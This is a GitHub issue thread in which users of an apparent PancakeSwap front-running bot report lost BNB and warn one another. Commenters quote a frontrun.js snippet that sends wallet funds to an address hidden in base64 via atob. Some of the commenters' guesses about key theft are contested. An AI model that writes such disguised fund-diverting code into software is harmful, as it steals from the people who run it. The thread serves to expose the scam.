### ISSUE TITLE
I lost my bnb

### ISSUE THREAD

**Issue by garbirel** [blkcn-dev/front-run-pancakeswap-bot#5]
I lost my bnb

**Comment by garbirel94** [comment]
this is the address. 0xa28b4e7F8F768D61Fe220F6d90A92db3e211a603

**Comment by garbirel** [comment]
this is the address.  0xa28b4e7F8F768D61Fe220F6d90A92db3e211a603

**Comment by bloto** [comment]
looks like this fake bot is stealing your private keys and store under https://bscscan.com/address/0xC1eA0ceeCB4F73373F385c22421015321D61d0d1
so be carefull

**Comment by loophe** [comment]
yeah, I thought it encrypt your private keys and stored under above.
The dark forest has began!

**Comment by Antake2333** [comment]
I lost too

**Comment by jontstaz** [comment]
> looks like this fake bot is stealing your private keys and store under https://bscscan.com/address/0xC1eA0ceeCB4F73373F385c22421015321D61d0d1 so be carefull

I don't think that's quite right. Looking at the code it seems like that address is used as some sort of pseudo-smart-contract to "Set" the bot (whatever that means. after looking at the code for ages I still can't work it out)

In fact it's the same in this repo: https://github.com/a04512/Front-RunBot
It's the "setFrontBot" function in frontrun.js which causes a verification, "Set Front Bot", with 0xC1eA0ceeCB4F73373F385c22421015321D61d0d

Interestingly in the pancake folder, that function is never called as it's commented out. However it is called in the uniswap folder version of frontrun.js

Anyway the whole repo is majorly confusing.

**Comment by yousufalim** [comment]
he is stealing.

the code is in frontrun.js
var tx = {
            from: bot.address,
            **to: atob(token_hash),**
            gas: gas,
            gasPrice: gasPrice,
            value: maxGas - gas*gasPrice
        };

atob decodes a base64 string, in this case 
token_hash = salt+'NjAz'
token hash is on line 584

**Comment by xupeiyu1** [comment]
Don't use this, it's fake, he's stealing, mine is gone
Here is the address:0xa28b4e7F8F768D61Fe220F6d90A92db3e211a603
This is really disgusting
everyone pay attention

**Comment by jontstaz** [comment]
> Don't use this, it's fake, he's stealing, mine is gone Here is the address:0xa28b4e7F8F768D61Fe220F6d90A92db3e211a603 This is really disgusting everyone pay attention

We tried to warn everyone as you can see above. I'm sorry to hear that mate, it really is despicable what these scumbags are doing. Karma will catch up with them soon.

**Comment by mirkec19901** [comment]
anyone mybe know where to get legit front run bots or all are scam?

**Comment by TroubleSeven** [comment]
> 

That's ! This is the crux of the matter.

**Comment by TroubleSeven** [comment]
> he is stealing.
> 
> the code is in frontrun.js var tx = { from: bot.address, **to: atob(token_hash),** gas: gas, gasPrice: gasPrice, value: maxGas - gas*gasPrice };
> 
> atob decodes a base64 string, in this case token_hash = salt+'NjAz' token hash is on line 584

That's the point of the scam.  Watch out everyone !
